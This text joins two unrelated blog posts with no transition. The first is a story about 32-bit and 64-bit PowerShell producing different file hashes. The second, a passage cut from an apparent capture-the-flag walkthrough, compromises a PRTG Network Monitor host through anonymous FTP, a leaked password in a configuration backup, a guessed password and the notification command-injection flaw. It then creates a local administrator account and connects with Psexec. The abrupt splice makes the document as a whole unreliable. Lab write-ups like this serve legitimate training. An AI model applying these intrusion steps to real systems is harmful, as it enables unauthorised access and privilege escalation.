The other day I worked on a little project of mine and accidentally discovered, that Windows is able to produce different hash values for the same input.
wat?!
The problem here is, that the 64bit and 32bit Powershell both create different hash values for the same input, while using build in functionalities like Get-Filehash or binaries like certutil. The behavior is not restricted to Powershell, but expands to CMD aswell.
I thought that if somebody actually makes the effort to produce a hash value of something it is usually for something important and not just for fun. Which would mean that it could be important that the hashing algorithm actually works like intended. But when I reported the problem to the the Microsoft Security Center I got the following answer:
What you’re reporting appears to be a bug/product suggestion, but would not meet the bar for security servicing.
So i guess its “not that important”.
Anyway I thought it was nice to know and wanted to share this little story.
UPDATE – 11th May 2020:
To be honest, I was a little dissatisfied with Microsoft’s response. For this reason, I decided to ask people who are absolute experts in the field of IT security in the hope that they could explain to me how the behavior comes about. And I could hardly believe my eyes when Tavis Ormandy took the time to answer my question (which I am very happy and grateful for).
After receiving the email I tried to verify the explanation on one of my machines. I guess my assumption that this was a bug was wrong and that it was more of a feature. A required feature, which, like Tavis himself wrote, delivers a surprising result in this case. Thanks Tavis for the explanation.
First off we use Nmap to scan for open ports on the target system. Figure 1 shows all open ports including the results of a version scan with Nmap (-sv). As we can see the target machine offers a ftp service with anonymous login being enabled.
Due to the anonymous login we can logon to the system by using ftp with the username anonymous and an empty password. After the authentication we are able to see multiple directories as shown in figure 1. Inside the Users directory we find the home for user Public. Inside /Users/Public find the user.txt flag which we download via get user.txt onto our local system, which gives us access to the first flag as shown in figure 2. The next step is to take a look at the HTTP server on port 80 that we saw in figure 1. When we browse the website we see a login mask for an application called PRTG Network Monitor.
Now we start to do a little bit of research on Google to find any useful information about the application. Things that we might want to look up are default credentials and known vulnerabilities for PRTG.
Finding the default credentials for PRTG on the web is pretty easy but wont grant us any access to the application. Furthermore there are two interesting vulnerabilities that can be found online. The first one is about a credential leak where the application might store the password of any user that runs the application database in backup files of the configuration (LINK). The second vulnerability is a command injection that allows an authenticated user to execute local commands on the underlying system (LINK). Furthermore if the application is vulnerable to the command injection vulnerability we might gain system access with the highest privileges right away. This is due to the fact that if PRTG is being installed with the default configuration the vulnerable service runs as local system (LINK).
The first thing that we want to do is to check if we are able to get access to the application by finding any stored passwords in backups of the configuration file. To do so we use ftp with an anonymous login once again and browse the directory that we found in the article that described the vulnerability (LINK) and indeed we find a backup of an old configuration file called “PRTG Configuration.old.bak”. We download the backup file to our machine and search for any stored passwords. As figure 5 shows the backup file contains a cleartext password for the user prtgadmin which is the default administrative user for the application. But when we try to use the username and password on the website we fail to login. Since the password is from the year 2018 we do what users usually do and increase the number that is being used in the password. So when we use prtgadmin as username and PrTg@dmin2019 as password we are able to successfully login to the application.
The next step is to find out whether the command injection vulnerability is working on the target machine. After reading through the article that describes the vulnerability (LINK) we create a notification called add_user_off that executes a ping request to our attacking machine as shown in figure 6.
After running the notification the command gets executed and we receive icmp echo requests from the target system as shown in figure 7.
At this point we have verified that the target system is vulnerable to the command injection but we still have to find a way to exploit it in a way that gives us access to the machine itself. One thing that the author of the original article that described the vulnerability did was to create a new local user. So we might do that as well and create a new user called oit with the password OffensiveIT! as shown in figure 8. One thing that was already mentioned is that by default the vulnerable service of the PRTG application runs as local system which means that if this is the case in this scenario we can switch our new user to the administrators group. We test this right away by creating a new notification with the name changetoadm which executes the command as shown in figure 9.
If everything worked as intended we should be able to execute commands on the target system by using Psexec. One way to do so is by using the corresponding module in Metasploit as shown in figure 10.
But using Metasploit only for Psexec is a bit like bringing an assault rifle to a knife fight. So another way of doing it is by using the psexec.py module from Impacket as shown in figure 11.